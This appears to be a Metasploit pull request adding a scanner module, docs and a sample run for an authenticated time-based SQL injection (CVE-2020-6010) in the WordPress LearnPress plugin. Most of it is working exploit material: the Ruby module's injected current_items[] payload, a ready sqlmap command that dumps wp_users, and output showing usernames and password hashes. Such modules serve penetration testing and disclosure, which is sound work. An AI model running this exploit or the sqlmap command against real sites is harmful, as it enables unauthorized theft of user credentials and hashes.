### PR TITLE
Wordpress Plugin learnpress authenticated sqli

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/wp_learnpress_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_learnpress_sqli.md
@@ -1,0 +1,88 @@
+## Vulnerable Application
+
+LearnPress, a learning management plugin for WordPress,
+prior to 3.2.6.8 is affected by an authenticated SQL injection via the
+`current_items[]` parameter of the `post-new.php` page.
+
+The plugin can be downloaded [here](https://downloads.wordpress.org/plugin/learnpress.3.2.6.7.zip)
+
+This module slightly replicates sqlmap running as:
+
+```
+sqlmap -u 'http://<IP>/wp-admin/post-new.php?post_type=lp_order' --cookie '<cookie>' --data "type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1" -p "current_items[]" --technique T -T wp_users -C user_login,user_pass --dump --dbms mysql
+```
+
+## Verification Steps
+
+1. Install the plugin, use defaults
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/wp_learnpress_sqli`
+1. Do: `set username <username>`
+1. Do: `set password <password>`
+1. Do: `run`
+1. You should get the users and hashes returned.
+
+## Options
+
+### ACTION: List Users
+
+This action lists `COUNT` users and password hashes.
+
+## COUNT
+
+If acation `List Users` is selected (default), this is the number of users to enumerate.
+The larger this list, the more time it will take.  Defaults to `3`.
+
+### PASSWORD
+
+The password for a user.
+
+### USERNAME
+
+The username for a user.
+
+## Scenarios
+
+### LearnPress 3.2.6.7 on Wordpress 5.4.4 on Ubuntu 20.04
+
+```
+resource (learnpress.rb)> use auxiliary/scanner/http/wp_learnpress_sqli
+resource (learnpress.rb)> set rhosts 111.111.1.111
+rhosts => 111.111.1.111
+resource (learnpress.rb)> set username admin
+username => admin
+resource (learnpress.rb)> set password admin
+password => admin
+resource (learnpress.rb)> set verbose true
+verbose => true
+resource (learnpress.rb)> set count 3
+count => 3
+resource (learnpress.rb)> run
+[*] Checking /wp-content/plugins/learnpress/readme.txt
+[*] Found version 3.2.6.7 in the plugin
+[+] Vulnerable version detected
+[*] Enumerating Usernames and Password Hashes
+[*] {SQLi} Executing (select group_concat(CKvFyxDg) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) CKvFyxDg from wp_users limit 3) wmnJO)
+[*] {SQLi} Encoded to (select group_concat(CKvFyxDg) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0xd5,0)),ifnull(user_pass,repeat(0x49,0))) as binary) CKvFyxDg from wp_users limit 3) wmnJO)
+[*] {SQLi} Time-based injection: expecting output of length 124
+[+] wp_users
+========
+
+ user_login  user_pass
+ ----------  ---------
+ admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
+ admin2      $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
+ editor      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/wp_learnpress_sqli) > creds
+Credentials
+===========
+
+host  origin         service  public  private                             realm  private_type        JtR Format
+----  ------         -------  ------  -------                             -----  ------------        ----------
+      111.111.1.111           admin   $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0         Nonreplayable hash  phpass
+      111.111.1.111           editor  $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/         Nonreplayable hash  phpass
+      111.111.1.111           admin2  $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1         Nonreplayable hash  phpass
+```

--- a/modules/auxiliary/scanner/http/wp_learnpress_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_learnpress_sqli.rb
@@ -1,0 +1,127 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::SQLi
+
+  require 'metasploit/framework/hashes/identify'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress LearnPress current_items Authenticated SQLi',
+        'Description' => %q{
+          LearnPress, a learning management plugin for WordPress,
+          prior to 3.2.6.8 is affected by an authenticated SQL injection via the
+          current_items parameter of the post-new.php page.
+        },
+        'Author' =>
+          [
+            'h00die', # msf module
+            'Omri Herscovici', # Discovery and PoC
+            'Sagi Tzadik', # Discovery and PoC
+            'nhattruong' # edb poc
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['CVE', '2020-6010'],
+            ['URL', 'https://research.checkpoint.com/2020/e-learning-platforms-getting-schooled-multiple-vulnerabilities-in-wordpress-most-popular-learning-management-system-plugins/'],
+            ['EDB', '50137'],
+            ['WPVDB', '10208']
+          ],
+        'Actions' => [
+          ['List Users', { 'Description' => 'Queries username, password hash for COUNT users' }]
+        ],
+        'DefaultAction' => 'List Users',
+        'DisclosureDate' => '2020-04-29',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 1]),
+      OptString.new('USERNAME', [true, 'Valid Username for login', '']),
+      OptString.new('PASSWORD', [true, 'Valid Password for login', ''])
+    ]
+  end
+
+  def run_host(ip)
+    unless wordpress_and_online?
+      vprint_error('Server not online or not detected as wordpress')
+      return
+    end
+
+    checkcode = check_plugin_version_from_readme('learnpress', '3.2.6.8')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      vprint_error('Learnpress version not vulnerable')
+      return
+    end
+    print_good('Vulnerable version detected')
+
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+
+    if cookie.nil?
+      vprint_error('Invalid login, check credentials')
+      return
+    end
+
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|
+      res = send_request_cgi({
+        'method' => 'POST',
+        'cookie' => cookie,
+        'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'),
+        'vars_get' => {
+          'post_type' => 'lp_order'
+        },
+        'vars_post' => {
+          'type' => 'lp_course',
+          'context' => 'order-items',
+          'context_id' => Rex::Text.rand_text_numeric(2, 0), # avoid 0s incase leading 0 gives bad results
+          'term' => Rex::Text.rand_text_alpha(8),
+          'paged' => 1,
+          'lp-ajax' => 'modal_search_items',
+          'current_items[]' => "1 AND (SELECT #{Rex::Text.rand_text_numeric(4, 0)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)})"
+        }
+      })
+      fail_with Failure::Unreachable, 'Connection failed' unless res
+    end
+
+    unless @sqli.test_vulnerable
+      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
+      return
+    end
+    columns = ['user_login', 'user_pass']
+
+    print_status('Enumerating Usernames and Password Hashes')
+    data = @sqli.dump_table_fields('wp_users', columns, '', datastore['COUNT'])
+
+    table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)
+    data.each do |user|
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: user[0],
+        private_type: :nonreplayable_hash,
+        jtr_format: identify_hash(user[1]),
+        private_data: user[1],
+        service_name: 'Wordpress',
+        address: ip,
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+      table << user
+    end
+    print_good(table.to_s)
+  end
+end


### PR DESCRIPTION
This PR adds a wordpress plugin SQLi for authenticated users.

TBH, nothing really special about this, pretty easy.  Easy to install (I did the default and 'add default content' or something of the sort, although I'm not sure its actually required).  While the docs show me doing it with an admin user, any user works (just tested with a standard one).


## Verification

install the vulnerable plugin (it's on wordpress' site, or linked in the docs)

- [ ] Start `msfconsole`
- [ ] Do: `use auxiliary/scanner/http/wp_learnpress_sqli`
- [ ] Do: `set rhosts [ip]`
- [ ] Do: `set username <username>`
- [ ] Do: `set password <password>`
- [ ] Do: `run`
- [ ] **Verify** You should get the users and hashes returned.
- [ ] **Document** looks good, no spelling or format gifs
